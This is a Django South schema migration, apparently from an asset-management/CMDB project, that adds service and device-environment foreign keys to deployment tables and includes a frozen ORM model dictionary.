'snmp_version': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'discovery.marginkind': {
'Meta': {'object_name': 'MarginKind'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'margin': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.network': {
'Meta': {'ordering': "(u'vlan',)", 'object_name': 'Network'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '18'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'custom_dns_servers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['dnsedit.DNSServer']", 'null': 'True', 'blank': 'True'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'dhcp_broadcast': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp_config': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'gateway': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gateway_as_int': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignore_addresses': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.NetworkKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'last_scan': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'max_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'min_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'racks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'symmetrical': 'False'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'reserved': ('django.db.models.fields.PositiveIntegerField', [], {'default': '10'}),
'reserved_top_margin': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'terminators': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.NetworkTerminator']", 'symmetrical': 'False'}),
'vlan': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'discovery.networkkind': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkKind'},
'icon': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.networkterminator': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkTerminator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'dnsedit.dnsserver': {
'Meta': {'object_name': 'DNSServer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'scan.scansummary': {
'Meta': {'object_name': 'ScanSummary'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'false_positive_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '36'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'previous_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'tags.tag': {
'Meta': {'object_name': 'Tag'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['account.Profile']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'tags_tag_tags'", 'to': "orm['contenttypes.ContentType']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'official': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'stem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'related_tags'", 'null': 'True', 'to': "orm['tags.TagStem']"})
},
'tags.tagstem': {
'Meta': {'object_name': 'TagStem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'tag_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
}
}
complete_apps = ['deployment'] | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ArchivedDeployment.service'
db.add_column('deployment_archiveddeployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'ArchivedDeployment.device_environment'
db.add_column('deployment_archiveddeployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.service'
db.add_column('deployment_deployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.device_environment'
db.add_column('deployment_deployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
def backwards(self, orm):
# Deleting field 'ArchivedDeployment.service'
db.delete_column('deployment_archiveddeployment', 'service_id')
# Deleting field 'ArchivedDeployment.device_environment'
db.delete_column('deployment_archiveddeployment', 'device_environment_id')
# Deleting field 'Deployment.service'
db.delete_column('deployment_deployment', 'service_id')
# Deleting field 'Deployment.device_environment'
db.delete_column('deployment_deployment', 'device_environment_id')
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'cost_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'employee_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'manager': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'business.businesssegment': {
'Meta': {'object_name': 'BusinessSegment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.department': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Department'},
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.profitcenter': {
'Meta': {'object_name': 'ProfitCenter'},
'description': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.venture': {
'Meta': {'ordering': "(u'parent__symbol', u'symbol')", 'unique_together': "((u'parent', u'symbol'),)", 'object_name': 'Venture'},
'business_segment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.BusinessSegment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Department']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_infrastructure': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.Venture']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.ProfitCenter']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'show_in_ralph': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symbol': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'business.venturerole': {
'Meta': {'ordering': "(u'parent__name', u'name')", 'unique_together': "((u'name', u'venture'),)", 'object_name': 'VentureRole'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.VentureRole']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']"})
},
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'owners': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIOwner']", 'through': "orm['cmdb.CIOwnership']", 'symmetrical': 'False'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.cilayer': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'CILayer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'connected_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cmdb.ciowner': {
'Meta': {'object_name': 'CIOwner'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['account.Profile']", 'unique': 'True'})
},
'cmdb.ciownership': {
'Meta': {'object_name': 'CIOwnership'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIOwner']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'cmdb.cirelation': {
'Meta': {'unique_together': "((u'parent', u'child', u'type'),)", 'object_name': 'CIRelation'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child'", 'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parent'", 'to': "orm['cmdb.CI']"}),
'readonly': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.citype': {
'Meta': {'object_name': 'CIType'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon_class': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'deployment.archiveddeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'ArchivedDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'Deployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deploymentpoll': {
'Meta': {'object_name': 'DeploymentPoll'},
'checked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'deployment.massdeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'MassDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'generated_csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_done': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'})
},
'deployment.preboot': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Preboot'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'files': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['deployment.PrebootFile']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'deployment.prebootfile': {
'Meta': {'object_name': 'PrebootFile'},
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ftype': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '101', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'raw_config': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'discovery.connection': {
'Meta': {'object_name': 'Connection'},
'connection_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'inbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"}),
'outbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'outbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"})
},
'discovery.datacenter': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DataCenter'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.deprecationkind': {
'Meta': {'object_name': 'DeprecationKind'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
